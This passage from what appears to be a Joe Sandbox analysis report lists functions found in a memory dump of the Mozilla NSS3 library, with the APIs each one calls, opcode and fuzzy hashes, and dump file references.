Instruction ID: c777ad99025b4bf54b362d6cf2a316007d6ed83ca324664f17daf16052029966
Opcode Fuzzy Hash: 7f5ee12cdc1e772966721dac82287bbd9b1d095093a1745e51ee006fc0de4b39
Instruction Fuzzy Hash: 7A413A60B0519987EF009A95DC913AF36FAFF45708F454422DD4AD7E80E7225A498793

Function 6CAACF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CAACF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CAAD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CAAD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAAD025
PR_NewLock.NSS3 ref: 6CAAD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAAD074

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 6fccbfbd2848a8e13c4f5b8c2ff70517e73b73841da9c190a116f768eaefaf19
Instruction ID: 73243ee0783cf40dd41cf79cb8b3716f989d11267cbc45b085b287c22fd6c36d
Opcode Fuzzy Hash: 6fccbfbd2848a8e13c4f5b8c2ff70517e73b73841da9c190a116f768eaefaf19
Instruction Fuzzy Hash: B441D4B0E013118FEB10DFAAC88479A7BA4EF08319F154169DC5A8B746D775D8CACBA1

Function 6CAE8810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6CAE86AA), ref: 6CAE8851

Part of subcall function 6CAE1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE136A
Part of subcall function 6CAE1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE137E
Part of subcall function 6CAE1340: PL_ArenaGrow.NSS3(?,6CA7F599,?,00000000,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?), ref: 6CAE13CF
Part of subcall function 6CAE1340: PR_Unlock.NSS3(?,?,6CA8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CAE145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6CAE86AA), ref: 6CAE886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6CAE8890
PR_GetCurrentThread.NSS3 ref: 6CAE891C
PR_GetCurrentThread.NSS3 ref: 6CAE8937

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: d37acd1a04755be4e23e149ac5964dbf54e5e0444ce8c3f92245f88f2893fdfd
Instruction ID: 30a7b93d58399f5ffc4d0593ab0bdeda3895a924f40bd9995b6113c400484fe3
Opcode Fuzzy Hash: d37acd1a04755be4e23e149ac5964dbf54e5e0444ce8c3f92245f88f2893fdfd
Instruction Fuzzy Hash: 0841D7B0E016029FE704CF6CC890B65B7E4FF08308F148269D8188B751EB71E9A4DBD1

Function 6CA92E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CA82D1A), ref: 6CA92E7E

Part of subcall function 6CAE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA88298,?,?,?,6CA7FCE5,?), ref: 6CAE07BF
Part of subcall function 6CAE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAE07E6
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE081B
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE0825

PR_Now.NSS3 ref: 6CA92EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CA92EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CA82D1A), ref: 6CA92F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CA82D1A), ref: 6CA92F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CA92F81

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: b5948b6763604d563705cd67021fa6c76e69c825bb969a8fa5534e184b59b1e4
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: CE3134705211008BE714CE59CC8EFBE72E5EB80318F284779D02A87AD0EB3098DACA51

Function 6CAA6B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6CAA6BA9

Part of subcall function 6CAA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CAD379E,?,00000001,?), ref: 6CAA9542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6CAA6BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6CAA6BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6CAA6B97

Part of subcall function 6CAC1870: TlsGetValue.KERNEL32 ref: 6CAC18A6
Part of subcall function 6CAC1870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6CAA6C34,?,?,00000001,00000000,00000007,?), ref: 6CAC18B6
Part of subcall function 6CAC1870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAA6C34,?,?), ref: 6CAC18E1
Part of subcall function 6CAC1870: PR_SetError.NSS3(00000000,00000000), ref: 6CAC18F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6CAA6C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6CAA6C61

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: 6106f72ac0833a84eca5990d3a07454b8dbf9a5f343837c207bb9e756d2f7d9b
Instruction ID: ef64123411a678fa0390ca5c9b35deb9017bb95347767cd88031967993c0d1ad
Opcode Fuzzy Hash: 6106f72ac0833a84eca5990d3a07454b8dbf9a5f343837c207bb9e756d2f7d9b
Instruction Fuzzy Hash: 2F31D9B5B40305ABE7008F98DD81FAA7764DF45758F080069FE0497782E771D9968AE1

Function 6CA80E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CA80A2C), ref: 6CA80E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CA80A2C), ref: 6CA80E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CA80A2C), ref: 6CA80E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CA80A2C), ref: 6CA80E90
free.MOZGLUE(00000000), ref: 6CA80EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CA80A2C), ref: 6CA80ED9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 2debb23e61d74445b50c5fffdbc4521f0727c3c460012ff7fb30f210c66a8c2a
Instruction ID: 43da35fb6722e5ea0e32d8a8a9c7527ff0f563cc2ef8c53571079e0e047c3efe
Opcode Fuzzy Hash: 2debb23e61d74445b50c5fffdbc4521f0727c3c460012ff7fb30f210c66a8c2a
Instruction Fuzzy Hash: 5C214D72E036845FEB10496A9C85B6B76BFEFC1748F1D0035DC18A3A12FB60D8D882B1

Function 6CA6A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6CB49270), ref: 6CA6A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6CB49270), ref: 6CA6A9DE

Part of subcall function 6CA6AB40: __aulldiv.LIBCMT ref: 6CA6AB66

Part of subcall function 6CB4CA40: LeaveCriticalSection.KERNEL32(?), ref: 6CB4CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6CA6AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6CA6AA39
EnterCriticalSection.KERNEL32(?), ref: 6CA6AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CA6AAEB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: 2de367be520ab445441168c844950666980425fb525b03a19e74b7a715b67946
Instruction ID: 14d8896534dfcf3b38d09ae7028914bc188caf0d4f9c12ea40151abee36dbd48
Opcode Fuzzy Hash: 2de367be520ab445441168c844950666980425fb525b03a19e74b7a715b67946
Instruction Fuzzy Hash: 26419E706047158FD7109F2AC584796BBF2FB16328F28866EE45E8BA41DB71ECC5CB80

Function 6CA988D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAA0725,00000000,00000058), ref: 6CA98906
EnterCriticalSection.KERNEL32(?), ref: 6CA9891A
PL_ArenaAllocate.NSS3(?,?), ref: 6CA9894A
calloc.MOZGLUE(00000001,6CAA072D,00000000,00000000,00000000,?,6CAA0725,00000000,00000058), ref: 6CA98959
memset.VCRUNTIME140(?,00000000,?), ref: 6CA98993
PR_Unlock.NSS3(?), ref: 6CA989AF

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 46736c5f96cdea68c20ebd62f04ef30a7fe3234ca87dfaad599fd028cf9e0683
Instruction ID: 309b9d5575343aa66c3215fb93eb5ff7250391dce207912b7dc211dff751bdb5
Opcode Fuzzy Hash: 46736c5f96cdea68c20ebd62f04ef30a7fe3234ca87dfaad599fd028cf9e0683
Instruction Fuzzy Hash: 5231F572A10115AFD7009F68CC42A5977E8BF05358F198526EC1CD7B41E732E8C5C7D2

Function 6CA8AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA8AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CA8AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA8AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CA8AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CBA9500), ref: 6CA8AF23

Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CADF0C8
Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CADF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA8AF37

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: ce9568092f6f7b8bc725a55d9bfd64d313383a8c977bb6f1206fdd40132e67ab
Instruction ID: be8bc3b5e2c9bd5faae78db3d4797bb0ece39667c4ce7a95a511c577dcc0eada
Opcode Fuzzy Hash: ce9568092f6f7b8bc725a55d9bfd64d313383a8c977bb6f1206fdd40132e67ab
Instruction Fuzzy Hash: C1213A7190A2006BE7108F189C41B9E77E5AF8572CF184318FC589B7C1E731DD8887A3

Function 6CB98A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6CB98A8F

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

htons.WSOCK32(?), ref: 6CB98ACB
PR_GetCurrentThread.NSS3(?), ref: 6CB98AE2
htons.WSOCK32(?), ref: 6CB98B1E
htonl.WSOCK32(7F000001,?), ref: 6CB98B3B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: 65afdb382179a8a6fce20c94cc744dfc58c9d7b6e57525c8b1108b196533febb
Instruction ID: 17ffdd23234cabcf95dafc48ce671ee2d427a07e1cc6ef993458960089cab0ca
Opcode Fuzzy Hash: 65afdb382179a8a6fce20c94cc744dfc58c9d7b6e57525c8b1108b196533febb
Instruction Fuzzy Hash: 5D21AD60D54BD196C3208F75894156AB2B5EF9B308F25DA2FE8DD97A20F73294C4C391

Function 6CB0EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0EE85
realloc.MOZGLUE(1EE240A8,?), ref: 6CB0EEAE
PORT_Alloc_Util.NSS3(?), ref: 6CB0EEC5

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

htonl.WSOCK32(?), ref: 6CB0EEE3
htonl.WSOCK32(00000000,?), ref: 6CB0EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CB0EF01

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: c9a13df60873eb9c3023fbf1c91a0fe6fb7f7d5d4fd4df22642bff7e5a64b620
Instruction ID: de0d68d7dda1b1379b390d4db4d780f030f34c5532e771025649351867499df2
Opcode Fuzzy Hash: c9a13df60873eb9c3023fbf1c91a0fe6fb7f7d5d4fd4df22642bff7e5a64b620
Instruction Fuzzy Hash: AD21D331A002A89FDF109F28DC8079EBBA4EF49358F148169ED599B651E730EC14CBE2

Function 6CABEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CABEE49

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CABEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CABEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CABEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CABEEB3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: d69c6cfbaddca82ff940a270063865d7153ab658e14945f66d16bcdadaf3a38a
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 6F21D5B6A002107BEB118E58DC81EAB77ACEF45708F0901A4FD04AB351E771EC9887F1

Function 6CAE0AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0AAE
PL_HashTableDestroy.NSS3(?,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0ACA
PL_HashTableDestroy.NSS3(?,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0B24
free.MOZGLUE(?,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0B3C
memset.VCRUNTIME140(6CBE24E4,00000000,000005B0,?,?,6CA97F62,00000000,00000000,?,?,?,6CA980DD), ref: 6CAE0BC2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: 2ce39d6bffc25e4ddb434ebe0317d51700cc9bfd6ce53ec34b8eaa6717e6039c
Instruction ID: 809ad3b0b59a1a93e21ee75f2d25ba637b28eedad20d56b1e13e4e910690b117
Opcode Fuzzy Hash: 2ce39d6bffc25e4ddb434ebe0317d51700cc9bfd6ce53ec34b8eaa6717e6039c
Instruction Fuzzy Hash: AC21FBF0B002579AFF90DF65980EB423AB8A70EB8CF051425D909D7A41EB75D1889B93

Function 6CAD8A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CA861C4,?,6CA85F9C,00000000), ref: 6CAD8A81
TlsGetValue.KERNEL32(?,?,?,6CA85F9C,00000000), ref: 6CAD8A9E
EnterCriticalSection.KERNEL32(?,?,?,?,6CA85F9C,00000000), ref: 6CAD8AB7
PR_Unlock.NSS3(?,?,?,?,?,6CA85F9C,00000000), ref: 6CAD8AD2
PR_NotifyCondVar.NSS3(?,?,?,?,?,6CA85F9C,00000000), ref: 6CAD8B05
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6CA85F9C,00000000), ref: 6CAD8B18

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
